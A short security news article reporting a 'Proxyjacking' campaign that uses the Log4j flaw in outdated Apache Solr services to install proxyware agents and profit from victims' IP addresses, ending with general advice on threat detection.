HQ/EMEAFind out how we can help your business
A new cybercriminal campaign called Proxyjacking has exploited last year’s Log4j critical vulnerability. Based on reports, the campaign operators have used the infamous flaw to harvest IP addresses from its victims. The spot allowed the actors to infiltrate its targeted systems without authorisation.
The strategy of hijacking IP addresses has been prevalent for threat actors, which has allowed them to use it for numerous adware attacks for the past years.
The new Proxyjacking campaign is a common cryptocurrency attack that results in financial loss.
According to investigations, the newly discovered Proxyjacking attack is like a cryptojacking operation and steals crypto funds. The researchers explained that if the threat actors have compromised at least 100 IPs, they could generate a monthly profit of about $1,000.
Hence, many threat actors have adopted this technique as it has a lucrative and efficient method of stealing from compromised IP addresses. In addition, the Proxyjacking actors use minimal computing power and energy.
The campaign exploits the Log4j vulnerability to acquire initial access to victims’ systems. Subsequently, the threat actors install an agent that turns the infected account into a proxy server. This detail showed that the threat actors used a different tool than a standard backdoor.
These tactics allowed the attackers to harvest and sell the IP information of devices to a proxyware landscape. In this incident, the adversaries abuse an outdated Apache Solr service to take over the Kubernetes area.
The critical Log4j flaw remained a significant threat to all users despite the release of security updates. A recent tally showed that over 70% of organisations still suffered from the Log4Shell flaw in October last year.
The new Proxyjacking campaign allows the threat actors to gain reward by doing minimal work. This feature indicates that it could soon evolve into a more significant threat. As of now, the operator utilises a short list of proxyware services.
Experts suggest that potential targets adopt a robust threat detection protocol to receive alerts on initial access and payload activities. This defensive mechanism could allow them to mitigate the effects of these attacks.
